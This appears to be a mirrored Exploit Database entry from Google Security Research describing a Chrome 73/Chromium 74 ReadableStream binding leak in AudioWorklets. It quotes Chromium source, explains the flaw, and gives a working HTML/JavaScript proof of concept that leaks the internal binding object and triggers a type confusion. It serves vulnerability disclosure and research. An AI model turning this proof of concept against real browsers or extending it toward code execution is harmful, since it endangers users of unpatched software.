Google Chrome 73.0.3683.39 / Chromium 74.0.3712.0 – ‘ReadableStream’ Internal Object Leak Type Confusion

• Exploit Database
• 108 阅读

• 作者： Google Security Research
  日期： 2019-04-03
• 类别：

  • dos
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/46653/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139

  <!-- VULNERABILITY DETAILS https://cs.chromium.org/chromium/src/third_party/blink/renderer/bindings/core/v8/initialize_v8_extras_binding.cc?rcl=b16591511b299e0791def0b85dced2c74efc4961&l=90 void AddOriginals(ScriptState* script_state, v8::Local<v8::Object> binding) { // These values are only used when serialization is enabled. if (!RuntimeEnabledFeatures::TransferableStreamsEnabled()) return;   v8::Local<v8::Object> global = script_state->GetContext()->Global(); v8::Local<v8::Context> context = script_state->GetContext(); v8::Isolate* isolate = script_state->GetIsolate();   const auto ObjectGet = [&context, &isolate](v8::Local<v8::Value> object, const char* property) { DCHECK(object->IsObject()); return object.As<v8::Object>() ->Get(context, V8AtomicString(isolate, property)) .ToLocalChecked(); };   [...]   v8::Local<v8::Value> message_port = ObjectGet(global, "MessagePort"); v8::Local<v8::Value> dom_exception = ObjectGet(global, "DOMException");   // Most Worklets don&apos;t have MessagePort. In this case, serialization will // fail. AudioWorklet has MessagePort but no DOMException, so it can&apos;t use // serialization for now. if (message_port->IsUndefined() || dom_exception->IsUndefined()) // ***1*** return;   v8::Local<v8::Value> event_target_prototype = GetPrototype(ObjectGet(global, "EventTarget")); Bind("EventTarget_addEventListener", ObjectGet(event_target_prototype, "addEventListener"));   v8::Local<v8::Value> message_port_prototype = GetPrototype(message_port); Bind("MessagePort_postMessage", ObjectGet(message_port_prototype, "postMessage")); [...]   https://cs.chromium.org/chromium/src/third_party/blink/renderer/core/streams/ReadableStream.js?rcl=b16591511b299e0791def0b85dced2c74efc4961&l=1044 function ReadableStreamSerialize(readable, port) { // assert(IsReadableStream(readable), //<code>! IsReadableStream(_readable_) is true</code>); if (IsReadableStreamLocked(readable)) { throw new TypeError(streamErrors.cannotTransferLockedStream); }   if (!binding.MessagePort_postMessage) { // ***2*** throw new TypeError(streamErrors.cannotTransferContext); }   const writable = CreateCrossRealmTransformWritable(port); const promise = ReadableStreamPipeTo(readable, writable, false, false, false); markPromiseAsHandled(promise); }   A worklet&apos;s context might not have the objects required to implement ReadableStream serialization. In that case, |AddOriginals| would exit early leaving the |binding| object partially initialized[1]. |ReadableStreamSerialize| checks if the "MessagePort_postMessage" property exists on the |binding| object to determine whether serialization is possible[2]. The problem is that the check would be observable to a getter defined on |Object.prototype|, which could leak the value of |binding|.     VERSION Google Chrome 73.0.3683.39 (Official Build) beta (64-bit) (cohort: Beta) Chromium 74.0.3712.0 (Developer Build) (64-bit)   Also, please note that the "stream serialization" feature is currently hidden behind the "experimental platform features" flag.     REPRODUCTION CASE The repro case uses the leaked |binding| object to redefine an internal method and trigger a type confusion. -->   <body> <h1>Click to start AudioContext</h1> <script> function runInWorket() { function leakBinding(port) { let stream = new ReadableStream; let binding; Object.prototype.__defineGetter__("MessagePort_postMessage", function() { binding = this; }); try { port.postMessage(stream, [stream]); } catch (e) {} delete Object.prototype.MessagePort_postMessage; return binding; }   function triggerTypeConfusion(binding) { console.log(Object.keys(binding));   binding.ReadableStreamTee = function() { return 0x4142; } let stream = new ReadableStream; stream.tee(); }   class MyWorkletProcessor extends AudioWorkletProcessor { constructor() { super();   triggerTypeConfusion(leakBinding(this.port)); }   process() {} }   registerProcessor("my-worklet-processor", MyWorkletProcessor); } let blob = new Blob([<code>(${runInWorket}())</code>], {type: "text/javascript"}); let url = URL.createObjectURL(blob);   window.onclick = () => { window.onclick = null;   class MyWorkletNode extends AudioWorkletNode { constructor(context) { super(context, "my-worklet-processor"); } }   let context = new AudioContext();   context.audioWorklet.addModule(url).then(() => { let node = new MyWorkletNode(context); }); } </script> </body>